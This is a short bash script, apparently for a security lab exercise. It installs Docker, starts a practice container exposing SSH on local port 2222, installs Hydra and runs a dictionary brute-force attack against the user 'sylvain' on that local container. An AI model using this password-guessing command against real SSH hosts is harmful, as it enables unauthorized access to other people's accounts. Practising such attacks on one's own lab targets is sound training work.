#!/bin/bash

# Install Docker
sudo apt-get update
sudo apt-get install -y docker.io

# Pull and run the Docker image
docker run -p 2222:22 -d -ti sylvainkalache/264-1

# Install Hydra
sudo apt-get install -y hydra

# Brute force the SSH account
hydra -l sylvain -P /path/to/password/dictionary 127.0.0.1 -s 2222 ssh

